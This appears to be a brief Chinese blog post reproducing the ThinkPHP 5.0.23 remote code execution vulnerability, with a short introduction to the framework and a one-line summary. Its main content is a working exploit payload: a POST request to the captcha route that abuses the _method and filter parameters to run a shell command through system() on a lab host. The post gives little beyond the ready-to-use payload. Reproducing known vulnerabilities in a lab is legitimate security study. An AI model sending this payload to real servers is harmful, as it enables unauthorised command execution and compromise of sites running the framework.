Please enable Javascript to view the contents

ThinkPHP5 5.0.23 远程代码执行漏洞 复现

 ·  ☕ 1 分钟  ·  ✍️ IceKam · 👀... 阅读

介绍

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。

Poc

Post

http://172.18.0.2/index.php?s=captcha

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

![ThinkPHP5 5.0.23 远程代码执行漏洞](/upload/2019/ThinkPHP5 5.0.23 远程代码执行漏洞.png)

总结

这个是一个基础性的漏洞。

分享
您的鼓励是我最大的动力
bitcoin QR Code

icekam
作者
IceKam
茶艺品鉴砖家,低端码字人口。